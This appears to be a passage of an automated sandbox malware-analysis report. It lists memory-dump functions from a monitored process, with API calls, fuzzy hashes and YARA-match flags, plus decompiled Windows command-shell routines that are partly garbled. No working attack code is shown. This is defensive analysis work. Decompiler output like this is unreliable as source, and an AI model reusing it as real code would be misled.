                                • Associated: 00000009.00000002.2392597984.0000000002370000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392615842.0000000002374000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392633868.0000000002377000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392644032.0000000002380000.00000040.00000001.sdmp Download File
                                • Associated: 00000009.00000002.2392726926.00000000023E0000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0009A066, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43memoryCOMMON
                                Download Yara Rule
                                APIs
                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083AF8), ref: 0009A09D
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: FreeHeap
                                • String ID: .z`
                                • API String ID: 3298025750-1441809116
                                • Opcode ID: f4337fe77560981ffbdf91ae04331d89af6cc2fbcee1e69a0dcfd809e590df10
                                • Instruction ID: 940986df621b42a5ddd1d44bad403964c178627a6f738787d8bc56df5eeabdac
                                • Opcode Fuzzy Hash: f4337fe77560981ffbdf91ae04331d89af6cc2fbcee1e69a0dcfd809e590df10
                                • Instruction Fuzzy Hash: 61F0AFB67042047FDB20EFA8DC85EE777A8EF85310F118569F94DAB242C631E9148BE1
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0009A070, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                Download Yara Rule
                                APIs
                                • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00083AF8), ref: 0009A09D
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: FreeHeap
                                • String ID: .z`
                                • API String ID: 3298025750-1441809116
                                • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                • Instruction ID: a7483037e4c1910e9d9a21d5e5a2e149c0cc1c863966a88349e8802865b111dc
                                • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                • Instruction Fuzzy Hash: F5E04FB12002086BDB14DF59CC45EE777ACEF88750F018554FD0857242C630F910CAF0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000882E8, Relevance: 3.1, APIs: 2, Instructions: 58threadwindowCOMMON
                                Download Yara Rule
                                APIs
                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0008834A
                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008836B
                                Memory Dump Source
                                • Source File: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: MessagePostThread
                                • String ID:
                                • API String ID: 1836367815-0
                                • Opcode ID: d5cb27abf99f798cb6fd9ade7d1c3d6ce644971d62333bc3d1c4c609b48c0965
                                • Instruction ID: 18ddbf30ee6b4379719acf4ebd7dcf623cdee078251c70060c157f435609b621
                                • Opcode Fuzzy Hash: d5cb27abf99f798cb6fd9ade7d1c3d6ce644971d62333bc3d1c4c609b48c0965
                                • Instruction Fuzzy Hash: DA01D431A802287BFB20B6A49C03FFE766CAB51F51F044119FB04BA1C2E6D46A0657E6
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000882F0, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                Download Yara Rule
                                APIs
                                • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0008834A
                                • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0008836B
                                Memory Dump Source
                                • Source File: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: MessagePostThread
                                • String ID:
                                • API String ID: 1836367815-0
                                • Opcode ID: 4a55148ff9da4d85293f36c1d21b3ca726a4155c96c158c46edfd0097c785396
                                • Instruction ID: b15f46ee9257f5a5c87ffb515308c002f2a10d2124ddc5db4670f24c2034491f
                                • Opcode Fuzzy Hash: 4a55148ff9da4d85293f36c1d21b3ca726a4155c96c158c46edfd0097c785396
                                • Instruction Fuzzy Hash: 9C018F31A802287AFB20B6949C43FFE776CAB51F51F044119FB04BA1C2EAD46A0657E6
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0009A0E0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0009A134
                                Memory Dump Source
                                • Source File: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: CreateInternalProcess
                                • String ID:
                                • API String ID: 2186235152-0
                                • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                • Instruction ID: 4a9b53bd2a9bc7990f2f7393a3eeed257928f61c893ff4aa5ad3e931d0c8cf1f
                                • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                • Instruction Fuzzy Hash: 4D01B2B2210108BFCB54DF89DC80EEB77ADAF8C754F158258FA0DA7241C630E851CBA4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0009A241, Relevance: 1.5, APIs: 1, Instructions: 31COMMON
                                Download Yara Rule
                                APIs
                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008F1A2,0008F1A2,?,00000000,?,?), ref: 0009A200
                                Memory Dump Source
                                • Source File: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: LookupPrivilegeValue
                                • String ID:
                                • API String ID: 3899507212-0
                                • Opcode ID: 3fdeb6ca31a1b35fed3662ad79e39c74a54a87e55869f500d98d6dd5068dd9e6
                                • Instruction ID: 8fbda16494af0d64741f8045b7d9dfa9c5980b7349abdf3ae44c84f6a015f4f1
                                • Opcode Fuzzy Hash: 3fdeb6ca31a1b35fed3662ad79e39c74a54a87e55869f500d98d6dd5068dd9e6
                                • Instruction Fuzzy Hash: 57F0E5342092D45BE722EB7498C04E6BF94DF8212832846DEECE84B107C626954B9B92
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0009A1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                Download Yara Rule
                                APIs
                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,0008F1A2,0008F1A2,?,00000000,?,?), ref: 0009A200
                                Memory Dump Source
                                • Source File: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: LookupPrivilegeValue
                                • String ID:
                                • API String ID: 3899507212-0
                                • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                • Instruction ID: 4ff4872ce74a436925e1108b6439f3c92e3127fea3b99fbfc9c4cc2734285a84
                                • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                • Instruction Fuzzy Hash: 55E01AB12002086BDB10DF49CC85EE737ADEF89650F018154BA0867242C930E8108BF5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0008F6A0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                Download Yara Rule
                                APIs
                                • SetErrorMode.KERNELBASE(00008003,?,00088CF4,?), ref: 0008F6CB
                                Memory Dump Source
                                • Source File: 00000009.00000002.2391054812.0000000000080000.00000040.00000001.sdmp, Offset: 00080000, based on PE: false
                                Yara matches
                                Similarity
                                • API ID: ErrorMode
                                • String ID:
                                • API String ID: 2340568224-0
                                • Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                • Instruction ID: 6417aeeebd7252583303f3220bff117056388d79c37cbfd200bc3d3567543684
                                • Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                • Instruction Fuzzy Hash: 22D0A7717903043BEA10FAA49C03F6632CD6B44B04F490074FA88D73C3E950E4014165
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Non-executed Functions

                                Function 4A5588D9, Relevance: 44.0, APIs: 15, Strings: 10, Instructions: 247COMMON
                                Download Yara Rule
                                C-Code - Quality: 84%
                                			E4A5588D9() {
				signed int _v8;
				short _v264;
				int _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t25;
				int _t27;
				int _t35;
				void* _t59;
				void* _t60;
				intOrPtr* _t62;
				int _t63;
				signed int _t66;
				intOrPtr* _t71;
				intOrPtr _t72;
				int _t83;
				void* _t84;
				signed int _t85;

				_t25 =  *0x4a5740ac; // 0xbb40e64e
				_v8 = _t25 ^ _t85;
				_t27 = E4A55756D();
				_t84 = GetLocaleInfoW;
				_v268 = _t27;
				if(GetLocaleInfoW(_t27, 0x1e, 0x4a574950, 8) == 0) {
					E4A55185A(0x4a574950, 8, E4A564E44);
				}
				if(GetLocaleInfoW(_v268, 0x23,  &_v264, 0x80) == 0) {
					L6:
					_push(E4A558B24);
					_t63 = 0x20;
					_push(_t63);
					_push(0x4a574bc0);
					E4A55185A();
					E4A55185A(0x4a574b80, _t63, E4A558B20);
					 *0x4a5741d0 =  *0x4a5741d0 & 0x00000000;
					_t35 = GetLocaleInfoW(_v268, 0x21,  &_v264, 0x80);
					_t66 = 2;
					if(_t35 != 0) {
						_t59 = (_v264 & 0x0000ffff) - 0x30;
						if(_t59 != 0) {
							_t60 = _t59 - 1;
							if(_t60 == 0) {
								 *0x4a5741d0 = 1;
								 *0x4a5741cc = L"dd/MM/yy";
							} else {
								if(_t60 == 1) {
									 *0x4a5741d0 = _t66;
									 *0x4a5741cc = L"yy/MM/dd";
								}
							}
						} else {
							 *0x4a5741d0 =  *0x4a5741d0 & 0x00000000;
							 *0x4a5741cc = L"MM/dd/yy";
						}
					}
					 *0x4a5741c8 = _t66;
					if(GetLocaleInfoW(_v268, 0x24,  &_v264, 0x80) != 0 && _v264 == 0x31) {
						 *0x4a5741c8 = 4;
					}
					if(GetLocaleInfoW(_v268, 0x1d, 0x4a574940, 8) == 0) {
						E4A55185A(0x4a574940, 8, 0x4a56bcb8);
					}
					if(GetLocaleInfoW(_v268, 0x31, 0x4a574d80, _t63) == 0) {
						E4A55185A(0x4a574d80, _t63, "Mon");
					}
					if(GetLocaleInfoW(_v268, 0x32, 0x4a574d40, _t63) == 0) {
						E4A55185A(0x4a574d40, _t63, "Tue");
					}
					if(GetLocaleInfoW(_v268, 0x33, 0x4a574d00, _t63) == 0) {
						E4A55185A(0x4a574d00, _t63, "Wed");
					}
					if(GetLocaleInfoW(_v268, 0x34, 0x4a574cc0, _t63) == 0) {
						E4A55185A(0x4a574cc0, _t63, "Thu");
					}
					if(GetLocaleInfoW(_v268, 0x35, 0x4a574c80, _t63) == 0) {
						E4A55185A(0x4a574c80, _t63, "Fri");
					}
					if(GetLocaleInfoW(_v268, 0x36, 0x4a574c40, _t63) == 0) {
						E4A55185A(0x4a574c40, _t63, "Sat");
					}
					if(GetLocaleInfoW(_v268, 0x37, 0x4a574c00, _t63) == 0) {
						E4A55185A(0x4a574c00, _t63, "Sun");
					}
					_t83 = 8;
					if(GetLocaleInfoW(_v268, 0xe, 0x4a574930, _t83) == 0) {
						E4A55185A(0x4a574930, _t83, E4A552EC4);
					}
					if(GetLocaleInfoW(_v268, 0xf, 0x4a574920, _t83) == 0) {
						_t56 = E4A55185A(0x4a574920, _t83, E4A564DE0);
					}
					__imp__setlocale(".OCP");
					return E4A5513A9(_t56, 0x4a574920, _v8 ^ _t85, _t72, _t83, _t84, 0);
				} else {
					_t71 = 0x4a558b28;
					_t62 =  &_v264;
					while(1) {
						_t72 =  *_t62;
						if(_t72 !=  *_t71) {
							break;
						}
						if(_t72 == 0) {
							L27:
							_t62 = 0;
							L5:
							 *0x4a574090 = _t62;
							goto L6;
						}
						_t72 =  *((intOrPtr*)(_t62 + 2));
						_t24 = _t71 + 2; // 0x90900000
						if(_t72 !=  *_t24) {
							break;
						}
						_t62 = _t62 + 4;
						_t71 = _t71 + 4;
						if(_t72 != 0) {
							continue;
						}
						goto L27;
					}
					asm("sbb eax, eax");
					asm("sbb eax, 0xffffffff");
					goto L5;
				}
			}






















                                0x4a5588e4
                                0x4a5588eb
                                0x4a5588f1
                                0x4a5588f6
                                0x4a558907
                                0x4a558911
                                0x4a564cc9
                                0x4a564cc9
                                0x4a558930
                                0x4a558953
                                0x4a558953
                                0x4a55895a
                                0x4a55895b
                                0x4a55895c
                                0x4a558961
                                0x4a558971
                                0x4a558976
                                0x4a55898d
                                0x4a558991
                                0x4a558994
                                0x4a55899d
                                0x4a5589a0
                                0x4a564cfc
                                0x4a564cfd
                                0x4a564d1b
                                0x4a564d25
                                0x4a564cff
                                0x4a564d00
                                0x4a564d06
                                0x4a564d0c
                                0x4a564d0c
                                0x4a564d00
                                0x4a5589a6
                                0x4a5589a6
                                0x4a5589ad
                                0x4a5589ad
                                0x4a5589a0
                                0x4a5589c7
                                0x4a5589d1
                                0x4a5589dd
                                0x4a5589dd
                                0x4a5589fb
                                0x4a564d3c
                                0x4a564d3c
                                0x4a558a14
                                0x4a564d4d
                                0x4a564d4d
                                0x4a558a2d
                                0x4a564d5e
                                0x4a564d5e
                                0x4a558a46
                                0x4a564d6f
                                0x4a564d6f
                                0x4a558a5f
                                0x4a564d80
                                0x4a564d80
                                0x4a558a78
                                0x4a564d91
                                0x4a564d91
                                0x4a558a91
                                0x4a564da2
                                0x4a564da2
                                0x4a558aaa
                                0x4a564db3
                                0x4a564db3
                                0x4a558ab2
                                0x4a558ac6
                                0x4a564dc4
                                0x4a564dc4
                                0x4a558adf
                                0x4a564dd5
                                0x4a564dd5
                                0x4a558aec
                                0x4a558b02
                                0x4a558932
                                0x4a558932
                                0x4a558937
                                0x4a55893d
                                0x4a55893d
                                0x4a558943
                                0x00000000
                                0x00000000
                                0x4a564cd6
                                0x4a564cf5
                                0x4a564cf5
                                0x4a55894e
                                0x4a55894e
                                0x00000000
                                0x4a55894e
                                0x4a564cd8
                                0x4a564cdc
                                0x4a564ce0
                                0x00000000
                                0x00000000
                                0x4a564ce6
                                0x4a564ce9
                                0x4a564cef
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a564cef
                                0x4a558949
                                0x4a55894b
                                0x00000000
                                0x4a55894b

                                APIs
                                  • Part of subcall function 4A55756D: GetUserDefaultLCID.KERNEL32(4A5627B1,0000001F,?,00000080), ref: 4A55756D
                                • GetLocaleInfoW.KERNEL32(00000000,0000001E,4A574950,00000008,4A575260,?,00000104), ref: 4A55890D
                                • GetLocaleInfoW.KERNEL32(?,00000023,?,00000080), ref: 4A55892C
                                • GetLocaleInfoW.KERNEL32(?,00000021,?,00000080,4A574B80,00000020,4A558B20,4A574BC0,00000020,4A558B24), ref: 4A55898D
                                • GetLocaleInfoW.KERNEL32(?,00000024,?,00000080), ref: 4A5589CD
                                • GetLocaleInfoW.KERNEL32(?,0000001D,4A574940,00000008), ref: 4A5589F7
                                • GetLocaleInfoW.KERNEL32(?,00000031,4A574D80,00000020), ref: 4A558A10
                                • GetLocaleInfoW.KERNEL32(?,00000032,4A574D40,00000020), ref: 4A558A29
                                • GetLocaleInfoW.KERNEL32(?,00000033,4A574D00,00000020), ref: 4A558A42
                                • GetLocaleInfoW.KERNEL32(?,00000034,4A574CC0,00000020), ref: 4A558A5B
                                • GetLocaleInfoW.KERNEL32(?,00000035,4A574C80,00000020), ref: 4A558A74
                                • GetLocaleInfoW.KERNEL32(?,00000036,4A574C40,00000020), ref: 4A558A8D
                                • GetLocaleInfoW.KERNEL32(?,00000037,4A574C00,00000020), ref: 4A558AA6
                                • GetLocaleInfoW.KERNEL32(?,0000000E,4A574930,00000008), ref: 4A558AC2
                                • GetLocaleInfoW.KERNEL32(?,0000000F,4A574920,00000008), ref: 4A558ADB
                                • setlocale.MSVCRT ref: 4A558AEC
                                Strings
                                Memory Dump Source
                                • Source File: 00000009.00000002.2393572633.000000004A550000.00000040.00000001.sdmp, Offset: 4A550000, based on PE: true
                                • Associated: 00000009.00000002.2393624568.000000004A590000.00000040.00000001.sdmp Download File
                                Similarity
                                • API ID: InfoLocale$DefaultUsersetlocale
                                • String ID: .OCP$1$Fri$MM/dd/yy$Mon$Sat$Sun$Thu$Tue$Wed
                                • API String ID: 1351325837-1452651164
                                • Opcode ID: cf5f75fd43a92a14cb2d9b859e216f847f1ec4864314fb7e97bbd0cfbf96ea9f
                                • Instruction ID: b4dd2b58968a9e20da74cb949043f76e4b3b422c550a93d4fc26565c18cddd00
                                • Opcode Fuzzy Hash: cf5f75fd43a92a14cb2d9b859e216f847f1ec4864314fb7e97bbd0cfbf96ea9f
                                • Instruction Fuzzy Hash: E071D8B4900115FAE7216A21DF40FAB6EBCEF91B54F020457F548B519DCBB0CE81DA25
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 4A5639B6, Relevance: 35.4, APIs: 19, Strings: 1, Instructions: 371fileCOMMONCrypto
                                Download Yara Rule
                                C-Code - Quality: 57%
                                			E4A5639B6(WCHAR* __ecx, unsigned int __edx, WCHAR* _a4) {
				signed int _v8;
				void _v522;
				char _v524;
				short _v1044;
				short _v4116;
				union _LARGE_INTEGER _v4120;
				int _v4124;
				long _v4128;
				int _v4132;
				long _v4136;
				void* _v4140;
				int _v4144;
				short* _v4148;
				signed int _v4152;
				signed int _v4156;
				int _v4160;
				char _v4164;
				signed int _v4168;
				WCHAR* _v4172;
				signed int _v4176;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t120;
				struct %anon52 _t122;
				WCHAR* _t123;
				long _t127;
				struct %anon52 _t129;
				void* _t131;
				void* _t135;
				long _t137;
				unsigned int _t140;
				long _t141;
				signed char* _t142;
				void* _t146;
				int _t147;
				long _t160;
				long _t162;
				long _t163;
				long _t164;
				long _t165;
				void* _t174;
				long _t175;
				long _t183;
				WCHAR* _t186;
				void* _t187;
				int _t194;
				long _t201;
				long _t202;
				signed int _t203;
				void* _t211;
				int _t214;
				long _t215;
				signed int _t218;
				void* _t219;
				void* _t222;

				_t208 = __edx;
				_t188 = __ecx;
				E4A552C26(0x104c);
				_t120 =  *0x4a5740ac; // 0xbb40e64e
				_v8 = _t120 ^ _t218;
				_v4168 = _v4168 | 0xffffffff;
				_t186 = _a4;
				_t214 = 0;
				_t211 = 1;
				_v4172 = _t186;
				_v4140 = 0;
				_v4164 = 0x7fffffff;
				_v4156 = 0;
				_v4152 = 0;
				_v4160 = 1;
				_t122 = E4A5539EF(_t186, 0);
				_v4120.LowPart = _t122;
				if(_t122 == 0xffffffff) {
					_t123 = E4A55321B(__ecx, L"DPATH");
					__eflags = _t123;
					if(_t123 == 0) {
						L11:
						__eflags =  *0x4a574128 - 0x7b;
						if( *0x4a574128 == 0x7b) {
							 *0x4a574128 = 2;
						}
						E4A56056B( *0x4a574128);
						L14:
						_t214 = _t211;
						L7:
						return E4A5513A9(_t214, _t186, _v8 ^ _t218, _t208, _t211, _t214);
					}
					_t188 =  &_v1044;
					_t127 = SearchPathW(_t123, _t186, 0, 0x104,  &_v1044, 0);
					__eflags = _t127;
					if(_t127 == 0) {
						goto L11;
					}
					_t129 = E4A5539EF( &_v1044, 0);
					_v4120.LowPart = _t129;
					__eflags = _t129 - 0xffffffff;
					if(_t129 != 0xffffffff) {
						goto L1;
					}
					goto L11;
				}
				L1:
				_v4148 =  &_v524;
				_t131 = E4A553B03( &_v524, _t188, _v4120.LowPart);
				_t186 = __imp___get_osfhandle;
				if(_t131 == 0) {
					_t183 = GetFileSize( *_t186( &_v4164), _v4120.LowPart);
					_v4168 = _t183;
					SetFilePointer( *_t186(_t214), _v4120.LowPart, _t214, _t214);
					_v4156 = _t211;
					_v4152 = _t214;
				}
				while(1) {
					_t222 =  *0x4a5741b4 - _t214; // 0x0
					if(_t222 != 0) {
						break;
					}
					_t135 =  *_t186(_v4120.LowPart,  &_v524, 0x200,  &_v4124, _t214);
					_t211 = ReadFile;
					_pop(_t191);
					if(ReadFile(_t135, ??, ??, ??, ??) == 0) {
						L75:
						_t137 = GetLastError();
						_push(_t214);
						 *0x4a574128 = _t137;
						_push(_t137);
						L76:
						E4A556D44(_t191);
						L6:
						E4A553AB3(_v4120.LowPart);
						goto L7;
					}
					if(_v4124 != _t214) {
						__eflags = _v4160 - _t214;
						if(_v4160 != _t214) {
							__eflags = _v524 - 0xfeff;
							_t191 = 0 | _v524 == 0x0000feff;
							_v4140 = _t191;
							__eflags = _t191 - _t214;
							if(_t191 != _t214) {
								_t35 =  &_v4124;
								 *_t35 = _v4124 - 2;
								__eflags =  *_t35;
								memmove( &_v524,  &_v522, _v4124);
								_t219 = _t219 + 0xc;
							}
						}
						_t140 = _v4124;
						_v4144 = _t140;
						__eflags = _v4140 - _t214;
						if(_v4140 == _t214) {
							_t141 = E4A554490(_t140, 1);
							__eflags = _t141;
							if(_t141 != 0) {
								L24:
								_t194 = _v4124;
								_t142 =  &_v524;
								_v4132 = _t194;
								__eflags = _t194 - _t214;
								if(_t194 <= _t214) {
									L31:
									_v4148 = _t214;
									_t146 = E4A56E4DC(1,  &_v524,  &_v4144,  &_v4148);
									__eflags = _t146 - _t214;
									if(_t146 != _t214) {
										_t147 = _v4124;
										L35:
										_t149 = MultiByteToWideChar( *0x4a5741b8, _t214,  &_v524, _t147,  &_v4116, 0x400);
										_v4132 = _t149;
										__eflags = _t149 - _t214;
										if(_t149 == _t214) {
											_t149 = 0x400;
											_v4132 = 0x400;
										}
										_t191 =  &_v4116;
										_v4148 =  &_v4116;
										goto L38;
									}
									_t147 = _v4144;
									__eflags = _t147 - _t214;
									if(_t147 != _t214) {
										goto L35;
									}
									goto L6;
								} else {
									goto L25;
								}
								while(1) {
									L25:
									_t203 =  *_t142 & 0x000000ff;
									__eflags =  *((char*)(_t203 + 0x4a574e40));
									if( *((char*)(_t203 + 0x4a574e40)) == 0) {
										goto L27;
									}
									L26:
									_t142 =  &(_t142[1]);
									_t49 =  &_v4132;
									 *_t49 = _v4132 - 1;
									__eflags =  *_t49;
									if( *_t49 == 0) {
										_t174 =  *_t186(_v4120.LowPart, _t142, 1,  &_v4132, _t214);
										_pop(_t191);
										_t175 = ReadFile(_t174, ??, ??, ??, ??);
										__eflags = _t175;
										if(_t175 == 0) {
											goto L75;
										}
										_t55 =  &_v4124;
										 *_t55 = 1 + _v4124;
										__eflags =  *_t55;
										_v4144 = _v4124;
										goto L31;
									}
									L27:
									_t142 =  &(_t142[1]);
									_t51 =  &_v4132;
									 *_t51 = _v4132 - 1;
									__eflags =  *_t51;
									if( *_t51 == 0) {
										goto L31;
									}
									L25:
									_t203 =  *_t142 & 0x000000ff;
									__eflags =  *((char*)(_t203 + 0x4a574e40));
									if( *((char*)(_t203 + 0x4a574e40)) == 0) {
										goto L27;
									}
									goto L26;
								}
							}
							__eflags =  *0x4a590668 - _t141; // 0x0
							if(__eflags != 0) {
								goto L24;
							}
							_t149 = _v4124;
							goto L20;
						} else {
							_t149 = _t140 >> 1;
							__eflags = _t149;
							L20:
							_v4132 = _t149;
							L38:
							__eflags = _v4160 - _t214;
							if(_v4160 != _t214) {
								__eflags =  *0x4a5740f4 - _t214; // 0x0
								if(__eflags != 0) {
									E4A556D44(_t191, 0x2354, 1, _v4172);
									_t219 = _t219 + 0xc;
								}
								_t149 = _v4132;
								_v4160 = _t214;
							}
							__eflags = _t149 - _t214;
							_t211 = _v4148;
							_v4128 = _t149;
							if(_t149 <= _t214) {
								L67:
								__eflags = _v4156 | _v4152;
								if((_v4156 | _v4152) != 0) {
									__eflags = 0;
									 *_t186( &_v4156, 1);
									SetFilePointerEx(0, _v4120.LowPart, 0, 0);
								}
								__eflags = _v4124 - _v4144;
								if(_v4124 != _v4144) {
									goto L6;
								} else {
									__eflags = _v4164 - _v4152;
									if(__eflags < 0) {
										goto L6;
									}
									if(__eflags > 0) {
										L73:
										_t211 = 1;
										continue;
									}
									__eflags = _v4168 - _v4156;
									if(_v4168 <= _v4156) {
										goto L6;
									}
									goto L73;
								}
							} else {
								do {
									_t215 = 0x50;
									__eflags = _v4128 - _t215;
									if(_v4128 > _t215) {
										L45:
										__eflags =  *0x4a5741b4;
										if( *0x4a5741b4 != 0) {
											E4A553AB3(_v4120.LowPart);
											_t214 = 1;
											goto L7;
										}
										_t160 = E4A554490(_t149, 1);
										__eflags = _t160;
										if(_t160 == 0) {
											__eflags =  *0x4a590668;
											if( *0x4a590668 != 0) {
												__eflags = _v4140;
												if(_v4140 == 0) {
													L55:
													_t187 = _t215 + _t215;
													_t162 = E4A55453E( &_v4136, 1, _t211, _t187,  &_v4136);
													__eflags = _v4140;
													if(_v4140 != 0) {
														 *((short*)(_t187 + _t211)) = _v4176;
													}
													_t191 = _v4136;
													_t186 = __imp___get_osfhandle;
													_t208 = _t191 >> 1;
													_t102 =  &_v4128;
													 *_t102 = _v4128 - (_t191 >> 1);
													__eflags =  *_t102;
													L58:
													_t211 = _t211 + _t191;
													__eflags = _t211;
													L59:
													__eflags = _t162;
													if(_t162 == 0) {
														L61:
														_t163 = GetLastError();
														 *0x4a574128 = _t163;
														__eflags = _t163;
														if(_t163 == 0) {
															 *0x4a574128 = 0x70;
														}
														_t214 = 1;
														_t164 = E4A553B03(_t163, _t191, 1);
														__eflags = _t164;
														if(_t164 == 0) {
															_t165 = E4A556BEA(_t164, 1);
															__eflags = _t165;
															if(_t165 == 0) {
																E4A56056B( *0x4a574128);
																goto L6;
															}
															_push(0);
															_push(0x2364);
															goto L76;
														} else {
															_push(0);
															_push(0x1d);
															_t149 = E4A556D44(_t191);
															goto L65;
														}
													}
													_t149 = _t215 + _t215;
													__eflags = _t191 - _t215 + _t215;
													if(_t191 == _t215 + _t215) {
														goto L65;
													}
													goto L61;
												}
												L54:
												_v4176 =  *(_t211 + _t215 * 2) & 0x0000ffff;
												__eflags = 0;
												 *(_t211 + _t215 * 2) = 0;
												goto L55;
											}
											__eflags = _v4140;
											if(_v4140 != 0) {
												goto L54;
											}
											L52:
											_t162 = WriteFile( *_t186(0), 1, _t211, _t215,  &_v4136);
											_t201 = _v4136;
											_v4128 = _v4128 - _t201;
											_t211 = _t211 + _t201;
											_t191 = _t201 + _t201;
											_v4136 = _t191;
											goto L59;
										}
										_t162 = WriteConsoleW(GetStdHandle(0xfffffff5), _t211, _t215,  &_v4136, 0);
										__eflags = _t162;
										if(_t162 == 0) {
											goto L52;
										}
										_t202 = _v4136;
										__eflags = _t202 - _t215;
										if(_t202 != _t215) {
											goto L52;
										}
										_v4128 = _v4128 - _t202;
										_t191 = _t202 + _t202;
										_v4136 = _t191;
										goto L58;
									}
									_t215 = _v4128;
									__eflags = _t215;
									if(_t215 == 0) {
										break;
									}
									goto L45;
									L65:
									__eflags = _v4128;
								} while (_v4128 > 0);
								_t214 = 0;
								__eflags = 0;
								goto L67;
							}
						}
					}
					goto L6;
				}
				E4A553AB3(_v4120);
				goto L14;
			}



























































                                0x4a5639b6
                                0x4a5639b6
                                0x4a5639c0
                                0x4a5639c5
                                0x4a5639cc
                                0x4a5639cf
                                0x4a5639d7
                                0x4a5639dc
                                0x4a5639e1
                                0x4a5639e3
                                0x4a5639e9
                                0x4a5639ef
                                0x4a5639f9
                                0x4a5639ff
                                0x4a563a05
                                0x4a563a0b
                                0x4a563a10
                                0x4a563a19
                                0x4a566093
                                0x4a566098
                                0x4a56609a
                                0x4a5660d2
                                0x4a5660d2
                                0x4a5660d9
                                0x4a5660db
                                0x4a5660db
                                0x4a5660eb
                                0x4a5660f0
                                0x4a5660f0
                                0x4a563acd
                                0x4a563add
                                0x4a563add
                                0x4a56609d
                                0x4a5660ac
                                0x4a5660b2
                                0x4a5660b4
                                0x00000000
                                0x00000000
                                0x4a5660be
                                0x4a5660c3
                                0x4a5660c9
                                0x4a5660cc
                                0x00000000
                                0x00000000
                                0x00000000
                                0x4a5660cc
                                0x4a563a1f
                                0x4a563a2b
                                0x4a563a31
                                0x4a563a36
                                0x4a563a3e
                                0x4a563a51
                                0x4a563a60
                                0x4a563a6a
                                0x4a563a70
                                0x4a563a76
                                0x4a563a76
                                0x4a563a7c
                                0x4a563a7c
                                0x4a563a82
                                0x00000000
                                0x00000000
                                0x4a563aa2
                                0x4a563aa4
                                0x4a563aaa
                                0x4a563ab0
                                0x4a566470
                                0x4a566470
                                0x4a566476
                                0x4a566477
                                0x4a56647c
                                0x4a56647d
                                0x4a56647d
                                0x4a563ac2
                                0x4a563ac8
                                0x00000000
